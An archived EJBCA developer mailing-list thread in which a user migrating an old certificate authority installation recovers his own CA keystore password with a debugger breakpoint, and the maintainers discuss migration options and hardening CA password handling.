Menu
▾
▴
Re: [Ejbca-develop] Problem migrating EJBCA
|
From: Tomas G. <to...@pr...> - 2013-04-17 06:08:56
|
Ah cool,then they had at least though about not using default password in the original installation :) On 04/17/2013 01:01 PM, Duarte Silva wrote: > No the problem was that it wasn't the default password (foo123), atleast > not for the root CA and sub CA used to sign the certificates. The conf > directory only had the sample files (remember that the system was > installed as a PoC but in the end was used in production pffffff). For > the more curious, the password used was 05813... I don't even know where > that comes from :P > > Later I figured out that I was lucky that the CA's were in auto > activation, otherwise when I restarted JBoss the password would have > been lost. I could also have checked the database for the pin'ed > password (I don't know where it is saved though) but in the end, I still > would have to deobfuscate it. > > I will purpose to management that in the new system, the administration > CA is the only that will use the password on file, the signing CA and > sub CA will use a different password each that will be stored in a > vault, they wont be in auto activation mode. If by some reason the > physical server or JBoss gets restarted a recovery process will have to > be followed where access to the password's/CA's needs to be approved. > > If the server gets owned they will still have to use it to create fake > certs (unless they know what to search for in the process memory) > instead of just extracting the CA's and using them externally. It's > about time to harden up things :) > > On 17 Apr 2013 00:41, "Tomas Gustavsson" <to...@pr... > <mailto:to...@pr...>> wrote: > > > An impressive demonstration of java skills! > > You were probably using the default keystore password. > So the other, even simpler option, would have been to look in the file > conf/ejbca.properties, where is is configured :-) > > If you require non-configured passwords in the future you can use CA > passwords that are not configured in any file, so you have to activate > your CAs manually with a password if you restart JBoss. > > I hope you will consider contributing to EJBCA in the future, people > with debugging skills are always needed :-) > > Cheers, > Tomas > > On 04/17/2013 12:46 AM, Duarte Silva wrote: > > I was able to recover the CA keystore password > > > > I downloaded the source code for EJBCA version 3.8.0 and after > grep'ing around > > I found the function loadKeystore(..., String keystorepass) in > the class > > SoftCAToken. > > > > Then I decided to import the code into Eclipse, start JBoss in > debug mode with > > the Eclipse debugger attached, a breakpoint in that function and > bam, instant > > password recovery!! > > > > In the end the password itself would be easly cracked by a > brute-force attack, > > but the way I did it as so much more style eheheh :P > > > > Best regards, > > Duarte Silva > > > > > > On Tuesday 16 April 2013 08:41:00 Tomas Gustavsson wrote: > >> There are always alternatives... > >> > >> I think you have many options depending on how much you know about > >> databases, or java programming etc. And how much time/money you > want to > >> spend. > >> > >> If you want to migrate to another database: > >> > >> You can write a program to export database contents and import into > >> another database. You can find HSQLDB tools (don't know if there is > >> any?) to SQL dump the database contents to import into another > database. > >> Or you can export the CAs and individual certificates to file > (of not > >> too many) and import it all in a new installation using the > EJBCA CLI. > >> > >> PrimeKey has some tools for the common criteria certified version of > >> EJBCA, EJBCA 5, that can be used to migrate between databases. > >> > >> Cheers, > >> Tomas > >> > >> On 04/15/2013 09:28 PM, Duarte Silva wrote: > >>> Hi David, > >>> > >>> the answer I was afraid of, specially because the older version > >>> installation is using a HSQLDB. There aren't any passwords > defined in the > >>> config files and it's been a long time, I don't even remember > what I have > >>> hate yesterday :| > >>> > >>> Is there an alternative way of exporting every CA and bulk > export the > >>> entities to then re-import them in the new installation? > >>> > >>> > >>> Best regards, > >>> Duarte Silva > >>> > >>> On Monday 15 April 2013 14:51:00 David CARELLA wrote: > >>>> Hi Duarte, > >>>> > >>>> You can see the documentation in EJBCA_HOME/doc/RELEASE_NOTES and > >>>> UPGRADE for information about upgrading from an earlier > version of EJBCA. > >>>> > >>>> To upgrade from 3.8.0, you will need to upgrade from 3.8.0 to > 3.11.x, > >>>> then from 3.11.x to 4.0.14. > >>>> > >>>> Cheers, > >>>> David Carella > >>>> > >>>> On 04/15/2013 01:48 PM, Duarte Silva wrote: > >>>>> Hi all, > >>>>> > >>>>> I have been using EJBCA since 2008, it is a old version > (3.8.0) and at > >>>>> the > >>>>> time the way the installation was done, wasn't the smartest. > Now I'm > >>>>> trying to migrate the old system to the new version of EJBCA. > >>>>> > >>>>> I have installed the new version in a proper manner (with an > actual > >>>>> database and so on) in a different machine and I'm now trying > to migrate > >>>>> the CA's and Entities to the newly created system. > >>>>> > >>>>> Whats the best approach to do this migration? > >>>>> > >>>>> Thanks in advance, > >>>>> Duarte Silva > >>>>> > >>>>> > ------------------------------------------------------------------------ > >>>>> -- > >>>>> ---- Precog is a next-generation analytics platform capable > of advanced > >>>>> analytics on semi-structured data. The platform includes APIs for > >>>>> building apps and a phenomenal toolset for data science. > Developers can > >>>>> use our toolset for easy data analysis & visualization. Get a > free > >>>>> account! http://www2.precog.com/precogplatform/slashdotnewsletter > >>>>> _______________________________________________ > >>>>> Ejbca-develop mailing list > >>>>> Ejb...@li... > <mailto:Ejb...@li...> > >>>>> https://lists.sourceforge.net/lists/listinfo/ejbca-develop > >>> > >>> > -------------------------------------------------------------------------- > >>> ---- Precog is a next-generation analytics platform capable of > advanced > >>> analytics on semi-structured data. The platform includes APIs for > >>> building apps and a phenomenal toolset for data science. > Developers can > >>> use our toolset for easy data analysis & visualization. Get a free > >>> account! http://www2.precog.com/precogplatform/slashdotnewsletter > >>> _______________________________________________ > >>> Ejbca-develop mailing list > >>> Ejb...@li... > <mailto:Ejb...@li...> > >>> https://lists.sourceforge.net/lists/listinfo/ejbca-develop > >> > >> > ---------------------------------------------------------------------------- > >> -- Precog is a next-generation analytics platform capable of > advanced > >> analytics on semi-structured data. The platform includes APIs > for building > >> apps and a phenomenal toolset for data science. Developers can > use our > >> toolset for easy data analysis & visualization. Get a free account! > >> http://www2.precog.com/precogplatform/slashdotnewsletter > >> _______________________________________________ > >> Ejbca-develop mailing list > >> Ejb...@li... > <mailto:Ejb...@li...> > >> https://lists.sourceforge.net/lists/listinfo/ejbca-develop > > > > > ------------------------------------------------------------------------------ > > Precog is a next-generation analytics platform capable of advanced > > analytics on semi-structured data. The platform includes APIs for > building > > apps and a phenomenal toolset for data science. Developers can use > > our toolset for easy data analysis & visualization. Get a free > account! > > http://www2.precog.com/precogplatform/slashdotnewsletter > > _______________________________________________ > > Ejbca-develop mailing list > > Ejb...@li... > <mailto:Ejb...@li...> > > https://lists.sourceforge.net/lists/listinfo/ejbca-develop > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for > building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > Ejbca-develop mailing list > Ejb...@li... > <mailto:Ejb...@li...> > https://lists.sourceforge.net/lists/listinfo/ejbca-develop > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > > > > _______________________________________________ > Ejbca-develop mailing list > Ejb...@li... > https://lists.sourceforge.net/lists/listinfo/ejbca-develop > |
